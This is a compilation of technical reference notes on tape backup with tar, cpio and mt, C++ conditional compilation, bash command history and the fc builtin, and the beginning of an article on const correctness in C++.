We have a directory sample in our home containing several files. Let's put them on the tape:

me@host:~$ tar cvf /dev/st0 sample
sample/
sample/picture.jpeg
sample/text.txt
sample/source.c


list the files on the tape

me@host:~$ tar tvf /dev/st0
drwxr-xr-x me/mygroup 0 2003-10-31 12:54:22 sample/
-rw------- me/mygroup 54864 2003-10-31 12:53:56 sample/picture.jpeg
-rw-r--r-- me/mygroup 1297 2003-10-31 12:54:03 sample/text.txt
-rw-r--r-- me/mygroup 58 2003-10-31 12:54:22 sample/source.c

eject the cartridge

me@host:~$ mt -f /dev/st0 rewoffl

The cartridge will be rewound and ejected by the tape drive. It's now time to label your cartridge. It's really difficult to extract the information from a tape without knowledge of how it was written! It may also be the time to write-protect the cartridge.

restore the files

Reinsert the cartridge into the tape drive.

me@host:~$ tar xvf /dev/st0
sample/
sample/picture.jpeg
sample/text.txt
sample/source.c

We have now restored the content of the archive on tape.

restore a single file

me@host:~$ tar xvf /dev/st0 sample/source.c
sample/source.c

Only the file source.c was restored. Be careful - you need to give the exact filename(s) to tar, and it often takes a long time to scan the tape until tar finds the right file.

Now some more sophisticated examples. A cartridge may contain more than one file, so you may put more than one backup on the same cartridge. We no longer use /dev/st0, which rewinds the tape after use; instead we use /dev/nst0, which leaves the tape at its current position when closed.

check if the tape is online

me@host:~$ mt -f /dev/st0 status
drive type = Generic SCSI-2 tape
drive status = 318767104
sense key error = 0
residue count = 0
file number = 0
block number = 0
Tape block size 0 bytes. Density code 0x13 (DDS (61000 bpi)).
Soft error count since last status=0
General status bits on (45010000):
BOT WR_PROT ONLINE IM_REP_EN


Note the status bits at the end of the output. These are useful, but are often cryptic. Here is an explanation of the most important ones:

Status Bit Description

BOT The tape is positioned at the beginning of the first file.

EOT A tape operation has reached the physical End Of Tape.

EOF The tape is positioned just after a filemark.

WR_PROT The tape (or drive) is write-protected. For some drives this can also mean that the drive does not support writing on the current medium type.

ONLINE The drive has a tape in place and ready for operation.

DR_OPEN Door is open. Depending on the type of drive, this usually means that the drive does not have a tape in place.

IM_REP_EN Immediate report mode. This bit is set if there are no guarantees that the data has been physically written to the tape when the write call returns. It is set to zero only when the driver does not buffer data and the drive is set not to buffer data.

SM The tape is currently positioned at a setmark. DDS specific.

EOD The tape is positioned at the end of recorded data. DDS specific.

D_6250, D_1600, D_800 This "generic" status information reports the current density setting for 9-track 1/2-inch tape drives only.

save a directory

me@host:~$ tar cvf /dev/nst0 sample
sample/
sample/picture.jpeg
sample/text.txt
sample/source.c

This is now the first file on the tape. Because we used /dev/nst0, the tape is now positioned at the end of this file.

save another directory

me@host:~$ tar cvf /dev/nst0 moresample
moresample/
moresample/source.c
moresample/binary

This is now our second file on the tape.

eject the cartridge

me@host:~$ mt -f /dev/st0 rewoffl

Now it's time to label the cartridge. There is no way to "see" how many files are on a tape.

restore the files

Restoring from the first backup is simple, but now we restore the files from the second one :-)

me@host:~$ mt -f /dev/nst0 fsf 1


me@host:~$ tar xvf /dev/nst0
moresample/
moresample/source.c
moresample/binary
me@host:~$ mt -f /dev/nst0 rewind

First we forward the tape to the second file. Then we restore the data, and at the end we rewind the tape. See the manpage of mt for all the options for forwarding and rewinding a tape.

Often, a cartridge is too small to hold all the data you want to save. tar supports "multivolume" archives with the command line option -M and will prompt you for the next tape:

me@host:~$ tar cvfM /dev/st0 bigdir
bigdir/
bigdir/ae
bigdir/arch
bigdir/ash
...
Prepare volume #2 for `/dev/st0' and hit return:
bigdir/ln
bigdir/loadkeys
...

To list or restore such an archive, you need to give tar the option -M. So be sure to label the cartridge.

Some people prefer to write their backups with cpio. I don't: cpio is a very feature-rich command, but on the other hand I always need the manpage when I want to create or expand an archive. cpio expects a file list on STDIN and creates the archive on STDOUT, or expects the archive for restoring on STDIN. To save data with cpio, you always need find to create the file list.

save the content of a directory

me@host:~$ find sample | cpio -ov -H newc > /dev/st0
sample
sample/picture.jpeg
sample/text.txt
sample/source.c
112 blocks

list the files on the tape

me@host:~$ cpio -itv < /dev/st0
drwxr-xr-x me/mygroup 0 2003-10-31 12:54:22 sample/
-rw------- me/mygroup 54864 2003-10-31 12:53:56 sample/picture.jpeg
-rw-r--r-- me/mygroup 1297 2003-10-31 12:54:03 sample/text.txt
-rw-r--r-- me/mygroup 58 2003-10-31 12:54:22 sample/source.c

restore the files

me@host:~$ cpio -ivd < /dev/st0
sample
sample/picture.jpeg
sample/text.txt
sample/source.c
112 blocks


See the manpage of cpio for all options. For the last time: label the cartridge, because the formats of cpio and tar are not compatible.

Now the worst case: you have an unlabeled cartridge in front of you and you don't know which data is on it. There are some tricks to find out. Insert the cartridge and determine the type of archive on it:

me@host:~$ file - < /dev/nst0
standard input: GNU tar archive

The first file on this tape is a tar archive.

me@host:~$ mt -f /dev/nst0 fsf 1

Forward tape to the next file.

me@host:~$ file - < /dev/nst0
standard input: POSIX tar archive

The second file is also a tar archive - but it seems to have been created on a UNIX like Solaris.

me@host:~$ mt -f /dev/nst0 fsf 1

Forward tape to the next file.

me@host:~$ file - < /dev/nst0
standard input: ASCII cpio archive (SVR4 with no CRC)

The third file on this tape is a cpio archive.

me@host:~$ mt -f /dev/nst0 fsf 1

Forward tape to the next file.

me@host:~$ file - < /dev/nst0
standard input: file: read failed (Input/output error).

OK, it's the end of the tape.

me@host:~$ mt -f /dev/nst0 rewind

Now we write down the files we have seen:

1 GNU tar archive

2 Posix tar archive

3 cpio archive

To see the content of each file on the tape, we now use the appropriate command to extract each archive:

me@host:~$ tar tvf /dev/nst0
. . .
me@host:~$ tar tvf /dev/nst0
. . .
me@host:~$ cpio -itv < /dev/st0
. . .


OTHER NOTES: (http://www.chem.tamu.edu/services/NMR/notes/notes_1.html )

mt retension This command retensions the tape to avoid losing data from the tape being stretched. This should be done with new tapes and with any tape that has not been used for a while.

mt rewind Rewind the tape to the beginning.

mt offline Rewind the tape if necessary and take unit off line. This should be done before you remove your tape from the drive.

mt fsf # File Skip Forward # file(s). This skips to just past an EOF mark, so that you are ready to read or write another data block after the previous one.

mt status Reports the status of the tape, including the file and block numbers. File will indicate the number of EOF marks skipped, block is an offset into the current file.

mt asf # Skip to an absolute position on the tape. Effectively combines the functions of the rewind and fsf commands.

mt eom Skip to 'End Of Media' position on the tape. This moves past the last EOF mark on the tape so that you can append a new tar file on the tape. You do not have to know how many tar files currently exist on the tape. After the 'eom' command, 'status' will show the number of files present.

Normal operation would be to use tar to create an archive on the tape after retensioning and rewinding it. This will also write an EOF mark and you can use the -t option to get a directory of the tar file.

Later, when you want to add data to the tape, use either 'mt fsf 1' or 'mt eom' to skip over the existing data and position the tape just past the EOF mark. 'mt status' should show file=1 and block=0. You can then use tar to create a new archive file here with the files to be added to the tape. 'mt offline' will rewind the tape and take the unit offline.

Still later, mt fsf 2 (or 'mt eom') will skip over both of these files so that you can write a third data set, the same way you did the second.

When you want to access nmr data from the second data set, for instance, you would use mt fsf 1 to skip the first file, and tar -x <filename> to extract the desired data. mt status would then show file=1 and block=xxxx, where xxxx is some offset into the file. mt fsf 1 would then skip forward over 1 EOF mark, leaving the tape positioned at the third data set ready to read data. mt status would show file=2 block=0. Note that the mt fsf # command skips forward over the specified number of EOF marks, not to an absolute tape archive file position. Jumping to an absolute tape file number would require doing a tape rewind first. You can however use mt asf # to do an Absolute Skip Forward. The argument supplied is the file number of interest, with the first being 0. This is logically equivalent to doing mt rewind followed by mt fsf # except that the rewind is omitted if the desired location is forward of the current location. Effectively, the system uses mt status to find the current location and will skip forward (#-current) EOF marks.

Please note that you cannot skip to the beginning of the second block, overwrite the data there with new data, and keep the third data block. The tape is inherently serial access rather than random access, and you cannot modify information in the middle of the tape. You could however overwrite the last data block on the tape.

In order to make it a little easier to keep track of the data stored on a tar tape cartridge, there is a tape directory script defined in /usr/local/bin as tape_dir. This command will read as many tar archives as it can find on your tape, list the contents of those files, and report a summary of the approximate amount of data stored on the tape. This output can be redirected to a disk file for later reference or printing. Simply load your tape in the drive and use tape_dir > mytape.dir to generate a disk file named mytape.dir with all the directory information present. If you want to print a hard copy, simply do lp -dLaserJet4a_prn -o nobanner mytape.dir. Please note that this printer definition is the LaserJet on NMRSUN1. The printer on NMRSUN2 is LaserJet4_prn. The -o nobanner option suppresses printing of the extra header page.


Conditional Compilation (C++)

Conditional compilation directives allow you to delimit portions of code that are compiled only if a condition is true.

Syntax

conditional-directive ::=
    #if constant-expression newline [group]
    #ifdef identifier newline [group]
    #ifndef identifier newline [group]
    #else newline [group]
    #elif constant-expression newline [group]
    #endif

NOTE: #elif is available only with the ANSI C preprocessor.

Here, constant-expression may also contain the defined operator:

defined identifier
defined (identifier)

Description

You can use #if, #ifdef, or #ifndef to mark the beginning of the block of code that will only be compiled conditionally. An #else directive optionally sets aside an alternative group of statements. You mark the end of the block using an #endif directive.

The following #if directive illustrates the structure of conditional compilation:

#if constant-expression
.
.
(Code that compiles if the expression evaluates to a nonzero value.)
.
.
#else
.
.
(Code that compiles if the expression evaluates to zero.)
.
.
#endif

The constant-expression is like other C++ integral constant expressions except that all arithmetic is carried out in long int precision. Also, the expressions cannot use the sizeof operator, a cast, an enumeration constant, or a const object.


Using the defined Operator

You can use the defined operator in the #if directive to use expressions that evaluate to 0 or 1 within a preprocessor line. This saves you from using nested preprocessing directives.

The parentheses around the identifier are optional. Below is an example:

#if defined (MAX) && ! defined (MIN) . . .

Without using the defined operator, you would have to include the following two directives to perform the above example:

#ifdef MAX
#ifndef MIN

Using the #if Directive

The #if preprocessing directive has the form:

#if constant-expression

Use #if to test an expression. HP C++ evaluates the expression in the directive. If the expression evaluates to a nonzero value (TRUE), the code following the directive is included. Otherwise, the expression evaluates to FALSE and HP C++ ignores the code up to the next #else, #endif, or #elif directive.

All macro identifiers that appear in the constant-expression are replaced by their current replacement lists before the expression is evaluated. All defined expressions are replaced with either 1 or 0 depending on their operands.

The #endif Directive

Whichever directive you use to begin the condition (#if, #ifdef, or #ifndef), you must use #endif to end the if section.

Using the #ifdef and #ifndef Directives

The following preprocessing directives test for a definition:

#ifdef identifier
#ifndef identifier

They behave like the #if directive, but #ifdef is considered true if the identifier was previously defined using a #define directive or the -D option. #ifndef is considered true if the identifier is not yet defined.

Nesting Conditional Compilation Directives

You can nest conditional compilation constructs. Delimit portions of the source program using conditional directives at the same level of nesting, or with a -D option on the command line.

Using the #else Directive


Use the #else directive to specify an alternative section of code to be compiled if the #if, #ifdef, or #ifndef conditions fail. The code after the #else directive is included if the code following any of the #if directives is not included.

Using the #elif Directive

The #elif constant-expression directive, available only with the ANSI C preprocessor, tests whether a condition of the previous #if, #ifdef, or #ifndef was false. #elif has the same syntax as the #if directive and can be used in place of an #else directive to specify an alternative set of conditions.

Examples

The following examples show valid combinations of these conditional compilation directives:

#ifdef SWITCH       // compiled if SWITCH is defined
#else               // compiled if SWITCH is undefined
#endif              // end of if

#if defined(THING)  // compiled if THING is defined
#endif              // end of if

#if A > 47          // compiled if A is greater than 47
#else
#if A < 20          // compiled if A is less than 20
#else               // compiled if A is greater than or equal
                    // to 20 and less than or equal to 47
#endif              // end of if, A is less than 20
#endif              // end of if, A is greater than 47

The following are more examples showing conditional compilation directives:

#if (LARGE_MODEL)
#define INT_SIZE 32     // Defined to be 32 bits.
#elif defined (PC) && defined (SMALL_MODEL)
#define INT_SIZE 16     // Otherwise, if PC and SMALL_MODEL
                        // are defined, INT_SIZE is defined
                        // to be 16 bits.
#endif

#ifdef DEBUG                            // If DEBUG is defined, display
cout << "table element : \n";           // the table elements.
for (i = 0; i < MAX_TABLE_SIZE; ++i)
    cout << i << " " << table[i] << '\n';
#endif


Using command history in the bash shell ( Linux )

(http://enterprise.linux.com/article.pl?sid=06/06/22/1517221&tid=13&tid=89&pagenum=1)

Monday July 03, 2006 (08:01 AM GMT). By Mark Sobell.

The Bourne Again Shell's history mechanism, a feature adapted from the C Shell, maintains a list of recently issued command lines, also called events, providing a quick way to reexecute any of the events in the list. This mechanism also enables you to execute variations of previous commands and to reuse arguments from them. You can replicate complicated commands and arguments that you used earlier in this login session or in a previous one and enter a series of commands that differ from one another in minor ways. The history list also serves as a record of what you have done. It can prove helpful when you have made a mistake and are not sure what you did, or when you want to keep a record of a procedure that involved a series of commands.

User Level: Intermediate. This article is excerpted from chapter 9 of the new Third Edition of A Practical Guide to Red Hat Linux: Fedora Core and Red Hat Enterprise Linux, copyright 2007 Pearson Education, Inc. ISBN 0132280272. Published June 2006 by Prentice Hall Professional. Reproduced by permission of Pearson Education, Inc. All rights reserved.

Variables that control history

The value of the HISTSIZE variable determines the number of events preserved in the history list during a session. A value in the range of 100 to 1,000 is normal. When you exit from the shell, the most recently executed commands are saved in the file given by the HISTFILE variable (the default is ~/.bash_history). The next time you start the shell, this file initializes the history list. The value of the HISTFILESIZE variable determines the number of lines of history saved in HISTFILE (not necessarily the same as HISTSIZE). HISTSIZE holds the number of events remembered during a session, HISTFILESIZE holds the number remembered between sessions, and the file designated by HISTFILE holds the history list.

Variable Default Function

HISTSIZE 500 events Maximum number of events saved during a session

HISTFILE ~/.bash_history Location of the history file

HISTFILESIZE 500 events Maximum number of events saved between sessions

The Bourne Again Shell assigns a sequential event number to each command line. You can display this event number as part of the bash prompt by including \! in the PS1 variable. Examples in this article show numbered prompts when they help to illustrate the behavior of a command. Give the following command manually or place it in ~/.bash_profile (to affect future sessions) to establish a history list of the 100 most recent events:

$ HISTSIZE=100

The following command causes bash to save the 100 most recent events across login sessions:

$ HISTFILESIZE=100

After you set HISTFILESIZE, you can log out and log in again, and the 100 most recent events from the previous login session will appear in your history list. Give the command history to display the events in the history list. The list of events is ordered with oldest events at the top of the list. The following history list includes a command to modify the bash prompt so that
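As a minimal sketch, you can exercise these variables even from a script; the set -o history line is needed only because non-interactive shells do not record history by default:

```shell
#!/bin/bash
set -o history        # scripts do not record history unless asked
HISTSIZE=100          # events kept during this session
HISTFILESIZE=100      # events kept between sessions
echo first  > /dev/null
echo second > /dev/null
history | tail -3     # show the last few numbered events
```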


it displays the history event number. The last event in the history list is the history command that displayed the list.

32 $ history | tail
23  PS1="\! bash$ "
24  ls -l
25  cat temp
26  rm temp
27  vim memo
28  lpr memo
29  vim memo
30  lpr memo
31  rm memo
32  history | tail

As you run commands and your history list becomes longer, it may run off the top of the screen when you use the history builtin. Pipe the output of history through less to browse through it, or give the command history 10 to look at the 10 most recent commands. You can reexecute any event in the history list. Not having to reenter long command lines allows you to reexecute events more easily, quickly, and accurately than you could if you had to retype the entire command line. You can recall, modify, and reexecute previously executed events in three ways: you can use the fc builtin (covered next); the exclamation point commands; or the Readline Library, which uses a one-line vi- or emacs-like editor to edit and execute events. If you are more familiar with vi or emacs and less familiar with the C or TC Shell, use fc or the Readline Library. If you are more familiar with the C or TC Shell and less familiar with vi and emacs, use the exclamation point commands. If it is a toss-up, try the Readline Library; it will benefit you in other areas of Linux more than learning the exclamation point commands will.

fc: Displays, Edits, and Reexecutes Commands

The fc (fix command) builtin enables you to display the history list and edit and reexecute previous commands. It provides many of the same capabilities as the command line editors.

When you call fc with the -l option, it displays commands from the history list. Without any arguments, fc -l lists the 16 most recent commands in a numbered list, with the oldest appearing first:

$ fc -l
1024     cd
1025     view calendar
1026     vim letter.adams01
1027     aspell -c letter.adams01
1028     vim letter.adams01
1029     lpr letter.adams01
1030     cd ../memos
1031     ls
1032     rm *0405
1033     fc -l
1034     cd
1035     whereis aspell
1036     man aspell
1037     cd /usr/share/doc/*aspell*
1038     pwd
1039     ls
1040     ls man-html

The fc builtin can take zero, one, or two arguments with the -l option. The arguments specify the part of the history list to be displayed:

fc -l [first [last]]

The fc builtin lists commands beginning with the most recent event that matches first. The argument can be an event number, the first few characters of the command line, or a negative number, which is taken to be the nth previous command. If you provide last, fc displays commands from the most recent event that matches first


through the most recent event that matches last. The next command displays the history list from event 1030 through event 1035:

$ fc -l 1030 1035
1030     cd ../memos
1031     ls
1032     rm *0405
1033     fc -l
1034     cd
1035     whereis aspell

The following command lists the most recent event that begins with view through the most recent command line that begins with whereis:

$ fc -l view whereis
1025     view calendar
1026     vim letter.adams01
1027     aspell -c letter.adams01
1028     vim letter.adams01
1029     lpr letter.adams01
1030     cd ../memos
1031     ls
1032     rm *0405
1033     fc -l
1034     cd
1035     whereis aspell

To list a single command from the history list, use the same identifier for the first and second arguments. The following command lists event 1027:

$ fc -l 1027 1027
1027     aspell -c letter.adams01
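fc is normally used interactively, but the -l form can be sketched in a script the same way (event numbers will differ from the 1024-1040 range shown above):

```shell
#!/bin/bash
set -o history        # enable history recording in the script
echo alpha > /dev/null
echo beta  > /dev/null
fc -l                 # lists recent events with their numbers
```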

You can use fc to edit and reexecute previous commands:

fc [-e editor] [first [last]]

When you call fc with the -e option followed by the name of an editor, fc calls the editor with event(s) in the Work buffer. Without first and last, fc defaults to the most recent command. The next example invokes the vi(m) editor to edit the most recent command:

$ fc -e vi

The fc builtin uses the stand-alone vi(m) editor. If you set the FCEDIT variable, you do not need to use the -e option to specify an editor on the command line. Because the value of FCEDIT has been changed to /usr/bin/emacs and fc has no arguments, the following command edits the most recent command with the emacs editor:

$ export FCEDIT=/usr/bin/emacs
$ fc

If you call it with a single argument, fc invokes the editor on the specified command. The following example starts the editor with event 21 in the Work buffer. When you exit from the editor, the shell executes the command:

$ fc 21

Again you can identify commands with numbers or by specifying the first few characters of the command name. The following example calls the editor to work on events from the most recent event that begins with the letters vim through event 206:

$ fc vim 206

When you execute an fc command, the shell executes whatever you leave in the editor buffer, possibly with unwanted results. If you decide you do not want to execute a command, delete everything from the buffer before you exit from the editor. You can reexecute previous commands without going into an editor. If you call fc with the -s option, it skips the editing phase and reexecutes the command. The following example reexecutes event 1029:

$ fc -s 1029
lpr letter.adams01

The next example reexecutes the previous command:

$ fc -s

When you reexecute a command you can tell fc to substitute one string for another. The next example substitutes the string john for the string adams in event 1029 and executes the modified event:

$ fc -s adams=john 1029
lpr letter.john01


Using an Exclamation Point (!) to Reference Events

The C Shell history mechanism uses an exclamation point to reference events, and is available under bash. It is frequently more cumbersome to use than fc but nevertheless has some useful features. For example, the !! command reexecutes the previous event, and the !$ token represents the last word on the previous command line. You can reference an event by using its absolute event number, its relative event number, or the text it contains. All references to events, called event designators, begin with an exclamation point (!). One or more characters follow the exclamation point to specify an event. You can put history events anywhere on a command line. To escape an exclamation point so that it is treated literally instead of as the start of a history event, precede it with a backslash (\) or enclose it within single quotation marks. An event designator specifies a command in the history list.

Event designators

Designator Meaning

! Starts a history event unless followed immediately by SPACE, NEWLINE, =, or (.

!! The previous command.

!n Command number n in the history list.

!-n The nth preceding command.

!string The most recent command line that started with string .

!?string[?] The most recent command that contained string . The last ? is optional.

!# The current command (as you have it typed so far).

!{event} The event is an event designator. The braces isolate event from the surrounding text. For example, !{-3}3 is the third most recently executed command followed by a 3.

You can always reexecute the previous event by giving a !! command. In the following example, event 45 reexecutes event 44:

44 $ ls -l text
-rw-rw-r--  1 alex group 45 Apr 30 14:53 text
45 $ !!
ls -l text
-rw-rw-r--  1 alex group 45 Apr 30 14:53 text

The !! command works whether or not your prompt displays an event number. As this example shows, when you use the history mechanism to reexecute an event, the shell displays the command it is reexecuting. A number following an exclamation point refers to an event. If that event is in the history list, the shell executes it. Otherwise, the shell displays an error message. A negative number following an exclamation point references an event relative to the current event. For example, the command !-3 refers to the third preceding event. After you issue a command, the relative event number of a given event changes (event -3 becomes event -4). Both of the following commands reexecute event 44:

51 $ !44
ls -l text
-rw-rw-r--  1 alex group 45 Nov 30 14:53 text
52 $ !-8
ls -l text
-rw-rw-r--  1 alex group 45 Nov 30 14:53 text


When a string of text follows an exclamation point, the shell searches for and executes the most recent event that began with that string. If you enclose the string between question marks, the shell executes the most recent event that contained that string. The final question mark is optional if a RETURN would immediately follow it.

68 $ history 10
59  ls -l text*
60  tail text5
61  cat text1 text5 > letter
62  vim letter
63  cat letter
64  cat memo
65  lpr memo
66  pine jenny
67  ls -l
68  history
69 $ !l
ls -l
...
70 $ !lpr
lpr memo
71 $ !?letter?
cat letter
...

Optional: Word Designators

A word designator specifies a word or series of words from an event.

Word designators

Designator Meaning

n The nth word. Word 0 is normally the command name.

^ The first word (after the command name).

$ The last word.

m-n All words from word number m through word number n; m defaults to 0 if you omit it (0-n).

n* All words from word number n through the last word.

* All words except the command name. The same as 1*.

% The word matched by the most recent ?string? search.

The words are numbered starting with 0 (the first word on the line, usually the command), continuing with 1 (the first word following the command), and going through n (the last word on the line). To specify a particular word from a previous event, follow the event designator (such as !14) with a colon and the number of the word in the previous event. For example, !14:3 specifies the third word following the command from event 14. You can specify the first word following the command (word number 1) by using a caret (^) and the last word by using a dollar sign ($). You can specify a range of words by separating two word designators with a hyphen.

72 $ echo apple grape orange pear
apple grape orange pear
73 $ echo !72:2
echo grape
grape
74 $ echo !72:^


echo apple
apple
75 $ !72:0 !72:$
echo pear
pear
76 $ echo !72:2-4
echo grape orange pear
grape orange pear
77 $ !72:0-$
echo apple grape orange pear
apple grape orange pear

As the next example shows, !$ refers to the last word of the previous event. You can use this shorthand to edit, for example, a file you just displayed with cat:

$ cat report.718
...

$ vim !$
vim report.718
...

If an event contains a single command, the word numbers correspond to the argument numbers. If an event contains more than one command, this correspondence does not hold true for commands after the first. In the following example, event 78 contains two commands separated by a semicolon so that the shell executes them sequentially; the semicolon is word number 5.

78 $ !72 ; echo helen jenny barbara
echo apple grape orange pear ; echo helen jenny barbara
apple grape orange pear
helen jenny barbara
79 $ echo !78:7
echo helen
helen
80 $ echo !78:4-7
echo pear ; echo helen
pear
helen

On occasion you may want to change an aspect of an event you are reexecuting. Perhaps you entered a complex command line with a typo or incorrect pathname, or you want to specify a different argument. You can modify an event or a word of an event by putting one or more modifiers after the word designator, or after the event designator if there is no word designator. Each modifier must be preceded by a colon (:). The substitute modifier is more complex than the other modifiers. The following example shows the substitute modifier correcting a typo in the previous event:

$ car /home/jenny/memo.0507 /home/alex/letter.0507
bash: car: command not found
$ !!:s/car/cat
cat /home/jenny/memo.0507 /home/alex/letter.0507
...

The substitute modifier has the following syntax:

[g]s/old/new/

where old is the original string (not a regular expression), and new is the string that replaces old. The substitute modifier substitutes the first occurrence of old with new. Placing a g before the s (as in gs/old/new/) causes a global substitution, replacing all occurrences of old. The / is the delimiter in the examples, but you can use any character that is not in either old or new. The final delimiter is optional if a RETURN would immediately follow it. As with the vim Substitute command, the history mechanism replaces an ampersand (&) in new with old. The shell replaces a null old string (s//new/) with the previous old string or string within a command that you searched for with ?string?. An abbreviated form of the substitute modifier is quick substitution. Use it to reexecute the most recent event while changing some of the event text. The quick substitution character is the caret (^). For example, the command

$ ^old^new^

produces the same results as

$ !!:s/old/new/

Thus substituting cat for car in the previous event could have been entered as


$ ^car^cat
cat /home/jenny/memo.0507 /home/alex/letter.0507
...

You can omit the final caret if it would be followed immediately by a RETURN. As with other command line substitutions, the shell displays the command line as it appears after the substitution. Modifiers (other than the substitute modifier) perform simple edits on the part of the event that has been selected by the event designator and the optional word designators. You can use multiple modifiers, each preceded by a colon (:). The following series of commands uses ls to list the name of a file, repeats the command without executing it (p modifier), and repeats the last command, removing the last part of the pathname (h modifier), again without executing it:

$ ls /etc/sysconfig/harddisks
/etc/sysconfig/harddisks
$ !!:p
ls /etc/sysconfig/harddisks
$ !!:h:p
ls /etc/sysconfig
$

This table lists event modifiers other than the substitute modifier.

Modifiers

Modifier Function

e (extension) Removes all but the filename extension

h (head) Removes the last part of a pathname

p (print-not) Displays the command, but does not execute it

q (quote) Quotes the substitution to prevent further substitutions on it

r (root) Removes the filename extension

t (tail) Removes all elements of a pathname except the last

x Like q but quotes each word in the substitution individually


Const Correctness in C++ ( C++ )

(http://www.research.att.com/~bs/books.html)

Introduction

A popular USENET joke goes:

In C, you merely shoot yourself in the foot.

In C++, you accidentally create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical care is impossible, because you can't tell which are bitwise copies and which are just pointing at others and saying, "That's me, over there."

While it is true that using the object-oriented features of C++ requires more thought (and hence, more opportunities to make mistakes), the language provides features that can help you create more robust and bug-free applications. One of these features is const, the use of which I will address in this article. Used properly with classes, const augments data-hiding and encapsulation to provide full compile-time safety; violations of const cause compile-time errors, which can save you a lot of grief (from side-effects and other accidental modifications of data). Some C++ programmers believe const-correctness is a waste of time. I disagree - while it takes time to use const, the benefits almost always outweigh the time spent debugging. Furthermore, using const requires you to think about your code and its possible applications in more detail, which is a good thing. When you get used to writing const-correctly, it takes less time - this is a sign that you have achieved a state of enlightenment. Hopefully this article will help put you on the path of eternal bliss.

A Constant Variable?

If the concept of a constant variable seems paradoxical to you, keep in mind that in programming terms, "variable" means any named quantity, whether or not it varies.

The Many Faces of Const

Like most keywords in C++, the const modifier has many shades of meaning, depending on context. Used to modify variables, const (not surprisingly) makes it illegal to modify the variable after its initialization. For example:

int x = 4;  // a normal variable that can be modified
x = 10;     // legal

const int x = 2;  // const var can be initialized, not modified thereafter
x = 10;           // error - cannot modify const variable

Thus, const can replace the use of #define to give names to manifest constants. Since preprocessor macros don't provide strong compile-time type checking, it is better to use const than #define. Moreover, some debugging environments will display the symbol which corresponds to a const value, but for #define constants, they will only display the value. The const keyword is more involved when used with pointers. A pointer is itself a variable which holds a memory address of another variable; it can be used as a "handle" to the variable whose address it holds. Note that there is a difference between "a read-only handle to a changeable variable" and "a changeable handle to a read-only variable".

const int x;  // constant int
x = 2;        // illegal - can't modify x


const int* pX;          // changeable pointer to constant int
*pX = 3;                // illegal - can't use pX to modify an int
pX = &someOtherIntVar;  // legal - pX can point somewhere else

int* const pY;          // constant pointer to changeable int
*pY = 4;                // legal - can use pY to modify an int
pY = &someOtherIntVar;  // illegal - can't make pY point anywhere else

const int* const pZ;    // const pointer to const int
*pZ = 5;                // illegal - can't use pZ to modify an int
pZ = &someOtherIntVar;  // illegal - can't make pZ point anywhere else

Const With Pointers and Type-Casting

A pointer to a const object can be initialized with a pointer to an object that is not const, but not vice versa.

int y;
const int* pConstY = &y;  // legal - but can't use pConstY to modify y
int* pMutableY = &y;      // legal - can use pMutableY to modify y
*pMutableY = 42;

In the above code, all you're really saying is that you can't use pConstY as a handle to modify the data it points to. If y is not const, then you can safely modify y via another pointer, pMutableY for instance. Pointing at y with a const int* does not make y const, it just means that you can't change y using that pointer. If y is const, however, forcing the compiler to let you mess with its value can yield strange results. Although you should never write code that does this, you can play tricks on the compiler and try to modify const data. All you need to do is somehow put the address of the const int into a normal int* that you can use to modify the const int. C++ does not allow you to circumvent const easily because the assignment operator can't be used to put the contents of a const int* into a normal int* without explicit casts. C++ does not supply a standard conversion from a const type to a type that is not const. However, any sort of conversion can be specified with explicit type casts (including unsafe conversions). Thus, the type-system in C++ generally will not allow you to put the address of const data into a pointer to non-const data. For example, try to put the address of x, which is const, into a normal int* so you can use it to modify the data:

const int x;         // x cannot be modified

const int* pX = &x;  // pX is the address of a const int
                     // and can't be used to change an int

*pX = 4;             // illegal - can't use pX to change an int

int* pInt;           // address of normal int
pInt = pX;           // illegal - cannot convert from const int* to int*

Nor will the compiler let you take the address of a const variable and store it in a pointer to non-const data using the address-of operator (&), for the same reason:

int *pInt;   // address of a normal int
pInt = &x;   // illegal - cannot convert from const int* to int*

The address-of operator returns a pointer to the variable; if the variable is a const int, it returns a const int*. If the variable is an int, & returns an int*. Thus C++ makes it difficult to obtain a pointer through which const data could be modified.


The const keyword can't keep you from purposely shooting yourself in the foot. Using explicit type-casting, you can freely blow off your entire leg, because while the compiler helps prevent accidental errors, it lets you make errors on purpose. Casting allows you to "pretend" that a variable is a different type. For example, C programmers learn early on that the result of dividing an integer by an integer is always an integer:

int x = 37;
int y = 8;

double quotient = x / y;   // classic mistake - integer division, the
                           // result is truncated before the assignment
cout << quotient;          // prints "4"

quotient = (double)x / y;  // cast an operand to double so the
                           // division isn't truncated
cout << quotient;          // prints "4.625"

With casting, you can force the compiler to let you put the address of a const int variable into a normal int*. Remember that const int* and int* are, in fact, separate types. So you can cast from a const int* to a normal int* and use the pointer to try and modify data. The result, however, is undefined. The compiler is free to store constants wherever it wants (including non-writeable memory), and if you trick the compiler into letting you try to modify the constant, the result is undefined. This means that it might work, it might do nothing, or it might crash your program. The following code is a good illustration of how to mess yourself up with forced casting:

const int x = 4;     // x is const, it can't be modified
const int* pX = &x;  // you can't modify x through the pX pointer

cout << x << endl; // prints "4"

int* pX2 = (int *)pX;  // explicitly cast pX as an int*
*pX2 = 3;              // result is undefined

cout << x << endl; // who knows what it prints?

On my system, this code compiles and runs without crashing, but x does not appear to be changed by the second assignment; it outputs '4' both times. However, when you look at it more closely, strange things are happening. When you run the code, the output (from cout or printf) seems to show that x doesn't change in the second assignment. But when you step through the code, the debugger shows you that x does, in fact, change. So what is happening? If x changes, then why doesn't the output statement reflect this change? Often in such bizarre situations, it is a good idea to look at the assembler code that was produced. In Visual C++, compile with the /Fa"filename.asm" option to output the assembler with the corresponding lines of code into a file so you can look at it. Don't panic if you don't know much about assembler - if you know how arguments are pushed onto the stack, it's really quite easy to see what's happening.

; ASSEMBLER OUTPUT                    ; C++ CODE
mov  eax, DWORD PTR _pX$[ebp]         ; int* pX2 = (int *)pX;
mov  DWORD PTR _pXX$[ebp], eax
mov  eax, DWORD PTR _pXX$[ebp]        ; *pX2 = 3;
mov  DWORD PTR [eax], 3
push OFFSET FLAT:?endl@@...           ; cout << x << endl;
push 4

The important line is "push 4". The assembler code shows that instead of pushing the value of x onto cout's stack frame, it pushes the literal constant 4 instead. The compiler assumes that since you declared x as const and initialized it as 4, it is free to optimize by pushing the literal constant 4 onto the stack rather than having to dereference x to get its value. This is a valid optimization, and happens in Visual C++ even with all optimization turned off. This code would work fine if we did not declare x as const. We could use a const int* to point at a non-const int, and have no trouble.

The const_cast Operator


